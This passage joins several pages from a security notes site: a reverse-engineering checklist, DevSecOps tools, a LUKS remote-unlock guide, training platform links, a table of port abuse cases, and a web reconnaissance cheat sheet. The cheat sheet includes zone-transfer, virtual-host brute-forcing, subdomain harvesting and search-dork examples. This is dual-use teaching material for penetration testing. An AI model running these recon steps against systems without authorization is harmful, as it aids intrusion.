VirusTotal. * Determine if the file is packed or obfuscated, and unpack if necessary. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#static-analysis) **Static Analysis:** * Open the file in a disassembler and analyze the assembly code. * Look for interesting strings, function calls, and control flow. * Identify the entry point and trace the execution flow. * Document any cryptographic algorithms, compression routines, or custom protocols. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#dynamic-analysis) **Dynamic Analysis:** * Run the program in a debugger. * Set breakpoints at key locations identified during static analysis. * Monitor the program's behavior, including function calls, variable values, and memory access. * Modify program execution to understand how different parts of the code behave. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#cryptanalysis-if-applicable) **Cryptanalysis (if applicable):** * Identify and analyze cryptographic functions. * Look for weak cryptographic practices (hardcoded keys, weak algorithms). * Attempt to decrypt or bypass cryptographic mechanisms if they are part of the challenge. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#automation-and-scripting) **Automation and Scripting:** * Write scripts to automate repetitive tasks or to brute-force solutions. * Use existing tools or frameworks to assist in analysis (e.g., Python scripts with pwntools or angr). ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#network-analysis-if-applicable) **Network Analysis (if applicable):** * If the challenge involves network communication, capture and analyze network traffic (e.g., with Wireshark). * Reverse engineer any custom network protocols or data transmission formats. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#solution-development) **Solution Development:** * Based on your analysis, develop a solution to the challenge. * This might involve creating a keygen, patching the binary, or extracting hidden information. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#documentation) **Documentation:** * Document your findings, methods, and thought process. * Prepare a write-up or report if required by the CTF. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#cleanup) **Cleanup:** * Clean up your environment after the challenge to ensure no residual or potentially harmful files are left behind. [PreviousVulnerable Machine Checklist](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/vulnerable-machine-checklist) [NextMagic Bytes](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist/magic-bytes) Last updated 6 months ago * [Initial Setup](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#initial-setup) * [File Analysis:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#file-analysis) * [Static Analysis:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#static-analysis) * [Dynamic Analysis:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#dynamic-analysis) * [Cryptanalysis (if applicable):](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#cryptanalysis-if-applicable) * [Automation and Scripting:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#automation-and-scripting) * [Network Analysis (if applicable):](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#network-analysis-if-applicable) * [Solution Development:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#solution-development) * [Documentation:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#documentation) * [Cleanup:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#cleanup) --- # DevSecOps | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/product-security-engineering/devsecops.md) . [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/devsecops#secure-software-objectives) Secure Software Objectives ------------------------------------------------------------------------------------------------------------------------------------------------ One simple way to describe the secure software objectives is to build or acquire software that satisŒies three Rs: Software must be reliable, resilient, and recoverable. ● Reliability means that software should function as expected. ● Resiliency means that software should withstand misuse and attack. ● Recoverability means having the ability for normal business operations restoration with minimal disruption. [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/devsecops#tools-for-implementing-devsecops-automation) Tools for implementing DevSecOps Automation ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/devsecops#development) Development [Git Secrets](https://github.com/awslabs/git-secrets) - Prevents you from committing secrets and credentials into git repositories Security plugins (Snyk, Fortify, Veracode) in any IDE ([VSCode](https://marketplace.visualstudio.com/VSCode) , [IntelliJ](https://www.jetbrains.com/idea/) ) [Trufflehog](https://github.com/trufflesecurity/trufflehog) - Find and verify credentials ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/devsecops#security-application-security-testing) Security (Application Security Testing) Code Quality - SonarQube, CodeQL SAST Security (Static) - Veracode, Chackmarx, Fortify Software Composition Analysis (SCA) Security - Fortify, Veracode, Blackduck, Snyk DAST (Dynamic) Security - OWASP ZAP, BurpSuite, WebInspect, Veracode DAST, Acunetix Infrastructure as Code (IaC) Security - Bridgecrew, Snyk Container Security - AQUA, Qualys, Prisma Cloud ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/devsecops#operations) Operations Pipeline Building - Jenkins, Azure DevOps, GCP CludBuild, AWS, GitHub Actions, GitLab Cloud Security Posture Management - AQUA, BridgeCrew Container Registry Scanning - AQUA, AWS Native Registry Infrastructure Scanning Tools - Chief Inspec (Compliance), Nessus Cloud Security - Azure Defense, AWS Security Hub, Prowler (AWS) [PreviousProduct Security Engineering](https://martian1337.gitbook.io/notes/notes/product-security-engineering) [NextDocker](https://martian1337.gitbook.io/notes/notes/product-security-engineering/devsecops/docker) Last updated 1 year ago * [Secure Software Objectives](https://martian1337.gitbook.io/notes/notes/product-security-engineering/devsecops#secure-software-objectives) * [Tools for implementing DevSecOps Automation](https://martian1337.gitbook.io/notes/notes/product-security-engineering/devsecops#tools-for-implementing-devsecops-automation) * [Development](https://martian1337.gitbook.io/notes/notes/product-security-engineering/devsecops#development) * [Security (Application Security Testing)](https://martian1337.gitbook.io/notes/notes/product-security-engineering/devsecops#security-application-security-testing) * [Operations](https://martian1337.gitbook.io/notes/notes/product-security-engineering/devsecops#operations) --- # Remote Unlock of LUKS-Encrypted Root Disk via SSH | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh.md) . * * * [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#remote-ssh-unlock-using-tailscale) Remote SSH Unlock Using Tailscale ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Remote unlocking via Tailscale works by running the Tailscale client inside the initramfs early boot environment. This allows you to SSH into the machine over your Tailscale tailnet before the encrypted root filesystem is unlocked. These instructions assume you already have Tailscale installed and configured normally on your system. 1. Add the tailscale-initramfs repository and install the package: Copy sudo mkdir -p --mode=0755 /usr/local/share/keyrings curl -fsSL https://darkrain42.github.io/tailscale-initramfs/keyring.asc | sudo tee /usr/local/share/keyrings/tailscale-initramfs-keyring.asc >/dev/null echo 'deb [signed-by=/usr/local/share/keyrings/tailscale-initramfs-keyring.asc] https://darkrain42.github.io/tailscale-initramfs/repo stable main' | sudo tee /etc/apt/sources.list.d/tailscale-initramfs.list >/dev/null sudo apt-get update sudo apt-get install tailscale-initramfs 1. Generate a Tailscale ephemeral auth key for the initramfs client: * Go to your Tailscale Admin Console. * Create an ephemeral auth key with a suitable expiration (up to 90 days). * Assign ACL tags to restrict the initramfs client's access to only inbound SSH connections for security. 1. Configure the auth key on your system by placing it into the file `/etc/tailscale/initramfs/config`: Copy --authkey=tskey-xxxxxxxxxxxxxxxxxxxxxxxxxxxxx --hostname=your-hostname-initramfs --accept-routes=false --accept-dns=false --exit-node=false Modify options as needed, but ensure the authkey is included. 1. Rebuild all the initramfs images to embed the Tailscale client and your configuration: 1. Reboot your system: During boot, the initramfs environment will start the embedded Tailscale client, which will connect to your tailnet using the ephemeral key. 1. SSH to your machine via its Tailscale IP or hostname from another device connected to the same tailnet: 1. Once connected, run the unlock command to enter the LUKS passphrase and continue the system boot: 1. Maintain your setup by renewing and updating the ephemeral auth key before it expires (keys last up to 90 days), or you risk losing remote unlock access. At this point, when your system boots, it will connect to your Tailscale network during initramfs phase, allowing SSH access over Tailscale. You can SSH into the machine using its Tailscale IP or hostname and run `cryptroot-unlock` remotely to enter the LUKS passphrase and continue booting. Because the Tailscale client in initramfs uses an ephemeral auth key, make sure to **renew and update the key in the initramfs before it expires** to avoid losing remote access. Using Tailscale in early boot removes the need for static IP or port forwarding setups since it leverages Tailscale’s private mesh VPN network for connectivity. This setup is ideal for remote servers or devices behind NAT where direct network access is limited or insecure. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#prerequisite-requirement-static-or-reserved-ip-add) Prerequisite Requirement without Tailscale: Static or Reserved IP Address Reliable remote unlocking **requires that your system has a static IP address or a DHCP reservation** that ensures the IP address remains constant between reboots. * The SSH server started in the early boot environment (initramfs) must be reachable at a known IP to connect and provide the LUKS passphrase remotely. * Changing IP addresses (dynamic DHCP without reservation) will likely prevent connecting to the system for remote unlock. * Setting a static IP or DHCP reservation is critical for both Debian (dropbear-initramfs) and Fedora (dracut-sshd) setups. * * * [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#debian-and-debian-based-systems-eg-ubuntu) Debian and Debian-Based Systems (e.g., Ubuntu) --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#prerequisites) Prerequisites * LUKS-encrypted root filesystem with unencrypted `/boot`. * SSH key pair for authentication. * Root access to the system. * **Static or DHCP-reserved IP address configured for early boot networking.** ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#steps) Steps **1\. Copy Your SSH Key to the System** **2\. Install Dropbear in Initramfs** Dropbear is a lightweight SSH server designed for early boot environments. **3\. Configure Network for Initramfs** Add a static IP configuration for the network interface inside `/etc/initramfs-tools/initramfs.conf`: Use the **same IP that your system uses normally** to maintain consistent access. **4\. Add SSH Public Keys for Dropbear** **5\. Update Initramfs and Reboot** You may see messages about unresolved devices related to cryptsetup; these are normal until unlocking. 6\. Unlock via SSH at Boot Enter your LUKS passphrase when prompted to unlock the disk and continue boot. * * * [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#fedora-and-similar-rpm-based-systems) Fedora and Similar RPM-Based Systems ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#prerequisites-1) Prerequisites * LUKS-encrypted root filesystem. * SSH key pair. * Root or sudo access. * **Static or DHCP-reserved IP address configured for early boot networking.** ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#steps-1) Steps **1\. Install** `**dracut-sshd**` **2\. Enable** `**dracut-sshd**` **Service for Initramfs** This enables an OpenSSH server to start in the initramfs environment during boot. **3\. Configure Network and Firewall** * Configure a static IP for your system normally. * Ensure network configuration allows SSH connections during early boot. * Optional: Edit dracut configuration to ensure network is brought up early. **4\. Regenerate Initramfs** **5\. Reboot System** **6\. SSH and Unlock** When the system is rebooting and waiting for LUKS unlock: Run the unlocking command as appropriate (often `cryptroot-unlock` or as specified in your system). * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#notes-and-best-practices) Notes and Best Practices * Use SSH key authentication exclusively for security. * Firewall rules must allow incoming SSH connections during early boot. * For environments where IP addresses may change, consider DHCP reservations to guarantee consistent IP assignment. * Physical or out-of-band access is a fallback if network unlocking fails due to address misconfiguration. * This setup is intended for headless or remotely-managed servers where physical console access is difficult. [PreviousExpose the Web UI over Tailnet](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh/expose-the-web-ui-over-tailnet) [NextGit](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git) Last updated 10 months ago * [Remote SSH Unlock Using Tailscale](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#remote-ssh-unlock-using-tailscale) * [Prerequisite Requirement without Tailscale: Static or Reserved IP Address](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#prerequisite-requirement-static-or-reserved-ip-add) * [Debian and Debian-Based Systems (e.g., Ubuntu)](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#debian-and-debian-based-systems-eg-ubuntu) * [Prerequisites](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#prerequisites) * [Steps](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#steps) * [Fedora and Similar RPM-Based Systems](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#fedora-and-similar-rpm-based-systems) * [Prerequisites](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#prerequisites-1) * [Steps](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#steps-1) * [Notes and Best Practices](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh#notes-and-best-practices) Copy sudo update-initramfs -c -k all Copy sudo reboot Copy ssh root@your-hostname-initramfs Copy cryptroot-unlock Copy ssh-copy-id -i /root/.ssh/id_rsa root@ Copy apt install dropbear-initramfs Copy cat << 'EOF' >> /etc/initramfs-tools/initramfs.conf IP=::::::off EOF Copy cp /root/.ssh/authorized_keys /etc/dropbear/initramfs/authorized_keys chmod 600 /etc/dropbear/initramfs/authorized_keys Copy update-initramfs -u reboot Copy ssh root@ cryptroot-unlock Copy sudo dnf install dracut-sshd Copy sudo systemctl enable dracut-sshd.socket Copy sudo dracut -f Copy sudo reboot Copy ssh @ --- # Offensive Security | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/training-and-career/platforms/offensive-security.md) . [](https://martian1337.gitbook.io/notes/training-and-career/platforms/offensive-security#web-training-environments) Web Training Environments -------------------------------------------------------------------------------------------------------------------------------------------------- [Alert to win](https://alf.nu/alert1) [Attack-Defense](https://attackdefense.com/) [Buggy Web App bWAPP](http://itsecgames.com/) [Certified Secure](https://www.certifiedsecure.com/) [Ctftime](https://ctftime.org/) [CTF Writeups from IgniteTechnologies](https://github.com/Ignitetechnologies/HackTheBox-CTF-Writeups) [CryptoHack](https://cryptohack.org/) [CMD Challenge](https://cmdchallenge.com/) [Exploitation Education](https://exploit.education/) [flAWS Cloud vulnerable app](http://flaws.cloud/) [Google CTF](https://capturetheflag.withgoogle.com/) [Hackaflag BR](https://hackaflag.com.br/) [HackTheBox](https://www.hackthebox.com/) ! [Hackthis](https://www.hackthis.co.uk/) [Hacksplaining](https://www.hacksplaining.com/lessons) [Hacker101](https://ctf.hacker101.com/) [Hacker Security](https://hackersec.com/capture-the-flag-ctf/) [Hacking-Lab](https://hacking-lab.com/) [HackXpert](https://hackxpert.com/) [HSTRIKE](https://hstrike.com/) [ImmersiveLabs](https://immersivelabs.com/) [KaliTut Linux and Pentesting blog](https://kalitut.com/) ! [LetsDefend](https://letsdefend.io/) [NewbieContest](https://newbiecontest.org/) [Nightmare - learn binary exploitation / reverse engineering skills](https://guyinatuxedo.github.io/) [OSBOXES](http://www.osboxes.org/) [OverTheWire](http://overthewire.org/) ! [OWASP Vulnerable-Web-Applications-Directory](https://owasp.org/www-project-vulnerable-web-applications-directory/) [Practical Pentest Labs](https://practicalpentestlabs.com/) [Pentesterlab](https://pentesterlab.com/) ! [Penetration Testing Practice Labs](https://www.amanhardikar.com/mindmaps/Practice.html) [PicoCTF](https://picoctf.com/) ! [PortSwigger Web Security Academy](https://portswigger.net/web-security) [PWNABLE](https://pwnable.kr/play.php) [Pwn college Web Security](https://pwn.college/intro-to-cybersecurity/web-security/) [RangeForce](https://www.rangeforce.com/) [Ringzer0 CTF](https://ringzer0ctf.com/challenges) [Root-Me](https://www.root-me.org/) [Root in Jail](http://rootinjail.com/) [SANS Challenger](https://www.holidayhackchallenge.com/) [Security Knowledge Framework](https://securityknowledgeframework.org/) [SmashTheStack](https://www.smashthestack.org/wargames.html) [TCM Security Academy](https://academy.tcm-sec.com/) ! [The Cryptopals Crypto Challenges](https://cryptopals.com/) [Tryhackme](https://tryhackme.com/) [Vulnhub](https://www.vulnhub.com/) ! [W3Challs](https://w3challs.com/) [WeChall](http://www.wechall.net/) [XSS Challenges from @moeinfatehi](https://github.com/moeinfatehi/xss_vulnerability_challenges) [Zenk-Security](https://www.zenk-security.com/) [Zero-Point Security](https://training.zeropointsecurity.co.uk/) [Vulnlab](https://vulndev.io/lab/) [](https://martian1337.gitbook.io/notes/training-and-career/platforms/offensive-security#system-exploit-development) System Exploit Development ---------------------------------------------------------------------------------------------------------------------------------------------------- [https://exploit.education/](https://exploit.education/) [https://ir0nstone.gitbook.io/notes/](https://ir0nstone.gitbook.io/notes/) [https://pwn.college](https://pwn.college/) [PreviousGeneral](https://martian1337.gitbook.io/notes/training-and-career/platforms/general) [NextDefensive Security](https://martian1337.gitbook.io/notes/training-and-career/platforms/defensive-security) Last updated 10 months ago * [Web Training Environments](https://martian1337.gitbook.io/notes/training-and-career/platforms/offensive-security#web-training-environments) * [System Exploit Development](https://martian1337.gitbook.io/notes/training-and-career/platforms/offensive-security#system-exploit-development) --- # Ports and associated Vectors | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/appsec/ports-and-associated-vectors.md) . Port Use case Abuse Case 21 21 FTP (File Transfer Protocol) Exploited for brute force attacks to gain unauthorized access to file shares and potentially upload malicious scripts or files. 22 SSH (Secure Shell) Targeted for brute force or dictionary attacks to gain remote control of systems. Often scanned for vulnerable or default credentials. 23 Telnet Because it's unencrypted, attackers could eavesdrop on communications, capturing credentials for unauthorized access. 25 SMTP (Simple Mail Transfer Protocol) Used for sending spam or phishing emails if the SMTP server is compromised or misconfigured. 53 DNS (Domain Name System) Exploited in DNS amplification attacks to overwhelm a network with DNS response traffic, leading to DDoS attacks. 80/443 HTTP/HTTPS (Web Services) Web servers on these ports can be targeted with various web application attacks such as SQL injection, XSS, or CSRF. 110/995 POP3/POP3S (Email Retrieval) Attackers could intercept unencrypted POP3 traffic to steal email credentials or use compromised accounts to spread malware. 135-139/445 Windows RPC/NetBIOS/SMB Exploited by malware like WannaCry for spreading within networks or to execute remote code. 143/993 IMAP/IMAPS (Email Retrieval) Similar to POP3, IMAP traffic can be intercepted to gain unauthorized access to email accounts. 161/162 SNMP (Simple Network Management Protocol) Misused to gather detailed network information or, in some configurations, to modify device settings. 389/636 LDAP/LDAPS (Directory Services) Attackers could exploit vulnerabilities to perform directory traversal attacks or gain unauthorized access to directory listings. 1433/1434 Microsoft SQL Server SQL injection attacks or unauthorized access for data theft or manipulation. Exploited for executing remote commands. 1521 Oracle Database Attackers may attempt to exploit vulnerabilities for unauthorized database access or to inject malicious SQL queries. 1812/1813 RADIUS (Remote Authentication Dial-In User Service) Used for network authentication. Vulnerable to brute force attacks or exploited for unauthorized network access if poorly configured. 3306 MySQL If accessible from externally, it can be brute-forced or exploited to gain access to databases, leading to data theft or loss. 3389 RDP (Remote Desktop Protocol) Often targeted for brute force attacks or BlueKeeplike vulnerabilities to gain remote control of systems. 3899 Radmin (Remote Administrator) A remote control software that can be abused for unauthorized remote access if left exposed or if weak credentials are used. 4444 Metasploit Framework’s default port for payloads Often used by attackers after exploiting a vulnerability to establish a reverse shell or gain control over a system. 4848 GlassFish Server Administration Console Can be targeted for unauthorized access or remote code execution if not secured with strong authentication. 5000 UPnP (Universal Plug and Play) Can be exploited to open other ports or for denialof-service attacks due to its capability to configure network devices. 5060/5061 SIP (Session Initiation Protocol) Utilized in VoIP environments, vulnerable to eavesdropping, toll fraud, or DDoS attacks targeting communication infrastructure. 5555 Android Debug Bridge If left open, can be exploited to install malicious applications, exfiltrate data, or control the device remotely without user consent. 5601 Kibana Exposed instances without proper authentication can lead to unauthorized access to data indexed by Elasticsearch. 5900/5901 VNC (Virtual Network Computing) Vulnerable to brute force attacks or unauthorized access if not properly secured with strong passwords and encryption. 5985/5986 WinRM (Windows Remote Management) If improperly configured, can be exploited for remote code execution or lateral movement within a network. 6379 Redis Unsecured instances may lead to data theft, ransomware, or unauthorized use of the server for malicious purposes. 6667 IRC (Internet Relay Chat) Historically used by botnets as command and control channels. Vulnerable to eavesdropping and man-in-the-middle attacks if not encrypted. 7547 CWMP (TR-069) - CPE WAN Management Protocol Exploited in mass-scale attacks to remotely manage home routers and modems. Vulnerabilities can lead to device compromise. 8000/8001 Common alternative HTTP ports Often used for web servers running in non-standard configurations, which may be less monitored and therefore vulnerable to web application attacks 8080/8443 Alternate HTTP/HTTPS Often used for web applications and services, which could be targeted with various web-based exploits if not secured. 8081 Proxy or web server alternative port Similar to port 8080, but less commonly monitored, making services hosted here potential targets for unnoticed exploitation. 8089 Splunkd Exposed management ports can lead to unauthorized access to Splunk datasets or system compromise. 8291 MikroTik RouterOS Winbox Vulnerabilities could allow attackers to bypass authentication and gain remote access to the device. 8444 Bitmessage A decentralized messaging protocol that can be abused for exfiltrating data or command and control if not properly secured. 9001/9030 Tor network entry/exit nodes Used by Tor for anonymous communication. Misconfigured Tor services can be exploited for malicious purposes or data exfiltration. 9100 PDL (Printer Description Language) Data Stream Vulnerable to printing denial of service or unauthorized document printing if exposed to a public network. 9200/9300 Elasticsearch Open ports can be misused for unauthorized data access, deletion, or index manipulation if not properly secured. 10000 Webmin A web-based interface for system administration for Unix. Vulnerable to exploitation if not regularly updated or properly secured 10050/10051 Zabbix Agent/Server Open Zabbix agents or servers could be compromised to gain information on monitored systems or to execute commands. 11211 Memcached Exploited in reflection DDoS attacks due to its high bandwidth amplification factor when left exposed to the internet. 27015 Valve's Source Dedicated Server Could be targeted for DDoS attacks, disrupting game servers and other services running on this port. 27017-27019 MongoDB Exposed databases can be targeted for unauthorized access, data leakage, or ransomware attacks due to misconfiguration or lack of authentication. 27018 MongoDB default port for Sharded clusters Similar risks as the default MongoDB port (27017), but specific to Sharded clusters. Misconfiguration can lead to unauthorized data access. 32400 Plex Media Server If improperly secured, can be accessed without authorization, potentially exposing personal media collections or being used for bandwidth theft. [PreviousPart 2](https://martian1337.gitbook.io/notes/notes/appsec/targeted-test-cases/part-2) [NextDNS](https://martian1337.gitbook.io/notes/notes/appsec/dns) Last updated 1 year ago --- # Information Gathering | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering.md) . ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#overview) Overview Web reconnaissance is the first step in security assessments or penetration testing, akin to a detective’s investigation to gather clues. The goals include: * Identifying assets like domains, subdomains, and IPs. * Uncovering hidden files, directories, and technologies. * Analyzing attack surfaces by finding open ports and software versions. * Gathering intelligence on employees, emails, and technologies for social engineering. Reconnaissance can be **Active** (direct interaction, higher detection risk) or **Passive** (no direct interaction, lower risk). Type Description Detection Risk Examples Active Reconnaissance Directly interacts with the target Higher Port scanning, vulnerability scanning, network mapping Passive Reconnaissance Uses public sources without direct interaction Lower Search engines, WHOIS, DNS enumeration, social media * * * ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#whois-lookups) WHOIS Lookups WHOIS provides domain ownership details like registrar, registration dates, nameservers, and contacts. Example command: Copy whois example.com Note: WHOIS data can be inaccurate or masked by privacy services. * * * ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#dns) DNS DNS translates domain names to IP addresses. Example with `dig` for IPv4 (A record): Common DNS record types: Record Type Description A Maps hostname to IPv4 address AAAA Maps hostname to IPv6 address CNAME Alias for hostname MX Mail servers for domain NS Authoritative name server delegation TXT Arbitrary text information SOA DNS zone administrative information * * * ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#subdomains-and-enumeration) Subdomains and Enumeration Subdomains organize services within a domain (e.g., mail.example.com). Enumeration Type Description Examples Active Enumeration Directly probes DNS servers Brute-forcing, DNS zone transfers Passive Enumeration Uses public data sources Certificate Transparency logs, search engine queries Tools for subdomain enumeration include `dnsenum` and combining active and passive methods enhances discovery. * * * ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#zone-transfers) Zone Transfers Full DNS zone transfers (AXFR) can reveal all DNS info. Example attempt: Often restricted but misconfiguration can expose info. * * * ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#virtual-hosts) Virtual Hosts Multiple websites share the same IP, differentiated by hostname. Tool example: `gobuster` with vhost mode to brute-force virtual hosts. Example command: * * * ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#certificate-transparency-logs) Certificate Transparency Logs CT logs record issued SSL/TLS certificates, revealing subdomains. Example command using `curl` and `jq` to fetch subdomains via crt.sh: * * * ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#web-crawling) Web Crawling Automated navigation to map site structure and gather info. * Important file: `robots.txt` shows disallowed crawling paths. * Framework: `Scrapy` in Python for web scraping. Example Scrapy spider snippet: * * * ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#search-engine-discovery) Search Engine Discovery Use search engines and advanced operators ("Google Dorks") for passive reconnaissance. Common operators: Operator Description Example `site:` Restrict to site `site:example.com "password reset"` `inurl:` Search URL `inurl:admin login` `filetype:` File type `filetype:pdf "confidential report"` `intitle:` Search page title `intitle:"index of" /backup` `cache:` Cached page `cache:example.com` `"search term"` Exact phrase `"internal error" site:example.com` `OR` Combine terms `inurl:admin OR inurl:login` `-` Exclude terms `inurl:admin -intext:wordpress` * * * ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#web-archives) Web Archives Wayback Machine archives historical website snapshots useful to find: * Past site content no longer available. * Hidden or removed directories/files. * Website content changes over time. [PreviousWeb Security Testing](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing) [NextWeb Fuzzing](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing) Last updated 5 months ago * [Overview](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#overview) * [WHOIS Lookups](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#whois-lookups) * [DNS](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#dns) * [Subdomains and Enumeration](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#subdomains-and-enumeration) * [Zone Transfers](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#zone-transfers) * [Virtual Hosts](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#virtual-hosts) * [Certificate Transparency Logs](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#certificate-transparency-logs) * [Web Crawling](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#web-crawling) * [Search Engine Discovery](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#search-engine-discovery) * [Web Archives](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering#web-archives) Copy dig example.com A Copy dig @ns1.example.com example.com axfr Copy gobuster vhost -u http://192.0.2.1 -w hostnames.txt Copy curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u Copy import scrapy class ExampleSpider(scrapy.Spider): name = "example" start_urls = ['http://example.com/'] def parse(self, response): for link in response.css('a::attr(href)').getall(): if any(link.endswith(ext) for ext in self.interesting_extensions): yield {"file": link} elif not link.startswith("#") and not link.startswith("mailto:"): yield response.follow(link, callback=self.parse) --- # Portable pyenv Setup for Python Vulnerability Research | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research.md) . This guide describes a repeatable, cross‑Linux workflow for setting up isolated 